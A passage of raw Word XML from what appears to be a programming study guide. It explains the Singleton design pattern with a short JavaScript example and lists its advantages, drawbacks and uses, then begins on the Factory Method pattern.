          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Private Constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The constructor is made private to prevent direct instantiation from outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F883EB" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Static Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A static method (often named getInstance() or similar) is provided to return the single instance of the class. This method creates the instance if it does not already exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9946E" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Static Instance Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A static variable is used to hold the single instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F0136F"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Basic Example in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6435E"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Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437357B2"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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF82CBE"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if (Singleton.instance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD95022"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Singleton.instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E423C1"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6F3CA988"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 Initialize any variables or state here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540C184"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this.data = "Singleton Data";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204CA937"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p>
    <w:p w14:paraId="380468AA"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Save the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3018C1"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Singleton.instance = this;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32532A"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1AD7529"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p>
    <w:p w14:paraId="667465F5"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 Method to get the instance of the Singleton class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A784D76"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static getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14405919"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if (!Singleton.instance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A6D486"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Singleton.instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233D440"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09625E3D"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Singleton.instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC60C79"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1D94E48"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p>
    <w:p w14:paraId="189CEF35"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 Example method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57918FEE"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getData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B88D6"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this.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD3863"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4DF8DBBF"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5F13078D"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p>
    <w:p w14:paraId="78158BE7"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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA51B65"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const singleton1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218E2E8"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const singleton2 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5C9CE"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p>
    <w:p w14:paraId="21DBB07D"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console.log(singleton1 === singleton2);  // Output: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E7E49" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5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console.log(singleton1.getData());       // Output: Singleton Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F65F3"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Characteristics of the Singleton Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6F44A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Controlled Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Since there is only one instance, the class can strictly control access to resources or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396B2FE" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lazy Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The instance is created only when it’s needed, which can improve performance if the instance is resource-intensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D9AA2" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global State</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Singleton can lead to a global state that is shared across the application. While this can be useful, it must be managed carefully to avoid unwanted dependencies or tight coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0202F5"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Advantages of the Singleton Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61383D21" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Controlled Access to a Single Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures that a class has only one instance, and provides a single point of access to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458E09CF" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lazy Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The instance is created only when first requested, which can save resources if the instance is not always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B1679" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Singleton instance is globally accessible, simplifying the management of shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A1CB7"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Disadvantages of the Singleton Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C5C96" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global State</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Singletons introduce a global state into the application, which can make testing and debugging difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B28EAF8" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tight Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Classes that depend on the Singleton are tightly coupled to it, which can make the system less flexible and harder to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAE4F7" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="498"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Difficulty in Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Singletons can make unit testing difficult, especially when they maintain state across tests or when mocking is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BEAC67"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Common Use Cases for the Singleton Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8A8A2" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configuration Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Managing global application settings where only one configuration object should exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A380D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A single logging service that collects and stores log messages throughout the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79652575" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resource Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Managing a pool of resources (like database connections) where only one controller or manager object should exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0E6C0" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15039C0A" w14:textId="1D11B5C3" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc178383333"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the Factory Method pattern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w14:paraId="676A3B90" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Factory Method pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a creational design pattern that provides an interface for creating objects in a superclass but allows subclasses to alter the type of objects that will be created. The main idea behind the Factory Method pattern is to define a method for creating objects, but to let the subclasses decide which class to instantiate. This approach promotes loose coupling by eliminating the need to bind application-specific classes into the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717BF26E"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Key Concepts of the Factory Method Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B104E1D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Product Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines the interface or abstract class that all concrete products must implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B917497" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Products</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implementations of the product interface that are created by the factory method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632BEB1" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creator Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Contains the factory method, which returns objects of the product interface type. The Creator class can be abstract or a concrete class with the factory method implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA4D44" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Creator Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Subclasses of the Creator class that override the factory method to return a specific product implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7302EFAF"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Purpose of the Factory Method Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B1FF70" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
